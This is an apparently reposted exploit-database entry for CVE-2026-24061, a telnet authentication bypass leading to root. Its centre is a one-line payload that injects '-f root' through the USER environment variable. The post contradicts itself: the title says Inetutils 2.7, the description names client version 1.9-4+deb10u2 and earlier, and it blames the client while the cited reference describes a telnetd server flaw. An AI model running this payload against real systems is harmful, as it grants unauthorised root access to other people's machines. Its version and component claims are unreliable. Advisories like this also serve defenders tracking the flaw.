GNU Inetutils 2.7 telnet Privilege Escalation

Latest Posts

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 23

GNU Inetutils 2.7 telnet Privilege Escalation

# Titles: Telnet Argument Injection GNU Inetutils 2.7 telnet Privilege Escalation

# Titles: Telnet Argument Injection Privilege Escalation - RCE
# Author: nu11secur1ty
# Date: 1/24/2026
# Vendor: https://www.gnu.org/software/inetutils/
# Software: https://www.gnu.org/software/inetutils/
# Reference:
https://nsfocusglobal.com/gnu-inetutils-telnetd-remote-authentication-bypass-vulnerability-cve-2026-24061-notice/
# CVE-2026-24061

## Description:
Argument/Command Injection via the USER environment variable in the
inetutils telnet client (version 1.9-4+deb10u2 and earlier). The client
improperly passes the USER environment variable contents as command-line
arguments to the telnet daemon (telnetd).

STATUS:
CRITICAL

## Affected Versions:
- inetutils-telnet 1.9-4+deb10u2 and earlier
- Debian 10 (buster) and derivatives
- Possibly other distributions with similar versions

# Attack Vector:
Network/Adjacent (requires telnet access)
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

[+]Payload:

```
USER="-f root" telnet -a 127.0.0.1 2323
```

# Demo:
[href](https://www.patreon.com/posts/telnet-argument-148994220)

# Time spent:
00:01:35

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>

Social Media Share

Get Rid of Ads!

Latest Posts

GNU Inetutils 2.7 telnet Privilege Escalation